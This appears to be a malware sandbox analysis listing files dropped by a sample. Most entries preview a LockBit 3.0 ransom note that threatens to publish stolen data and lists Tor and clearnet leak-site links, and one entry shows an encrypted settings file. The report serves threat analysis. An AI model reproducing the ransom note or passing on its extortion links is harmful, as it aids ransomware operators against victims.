                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977955839178153
                Encrypted:false
                SSDEEP:192:dgomwnVvKsWtioKBP/CMScXohgILa/NG/KeRxmBu69FvZo:Kom8ksRBP/nX4p+VRssF9F6
                MD5:A535D7978C92BF03D9C3528DD9403B7E
                SHA1:0931729BFDFD412B0E8BA59CC70427E742A9BC58
                SHA-256:4F6C325BE3CE466496C8A20E1BAA19AAFD076175F933D384AE9C49C4C2C98B23
                SHA-512:34B133D45DC7B01D90F4F2B4F7A24255378CDB9F4EDA1D9B958913389E462D05936E987CB8E0F4D25375F200B5C8E71C956A99B526699636219BD45468D2BDBC
                Malicious:false
                Preview:.\aw...Q.........O3...K.$..L..Si....v...a...\..K.....y..._...=..h}.".....P..o,..}......%..A....T.;X.r..........h......d.0G#..&Z....m..T..Q..XN..o..{.,;..Q.M.T;sZ......$fa...g.GI......3.\....*.#._......R..n{=..Aa..v....N........IO_*.'E<...k.}y..B..;....$..7V.T..K.:o.?..+....;h.)..5...)....t...~..5.._V..W...4nDZs.`9`Q&h....X...?.{n]...t&'...n.>_.KzU6.yh..FxVL!.X`lYt.....2Z..@.*2)..S..q, 7_G.C..}.G..<.w.O^HO..p,.........y.C.r..j.P6.......=7.....QA...q.q.&,.]z.JS...G../.&....$F.+....y..no7p......s...}:.\.~..~".i?.0..W.#.+b..........up....*....D...>.a<...p.3..O...A..\...5V.}kw...#.{..Oi%...$.a>.G.<w.M.v.....wtYbl...g!s.<.!fm\37........G.@...."Z..u..vweaw..L...N..i_.V...`.{.:..........q.Y'.)..9L......*m..+.....`n...T3!..jCVT...p....(q..~...w...;>nk?..A...Y.._..8[.y......=2..Z..{!...{..W.V$...E....Q..-.i.B.h."..h....5.....(....V.......R..w+.....2c*...8....t.....@4B.....BnO....^?......^..2.X.Y......7..].2[GM.g.?...3.....Ob]...E3....]s3

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
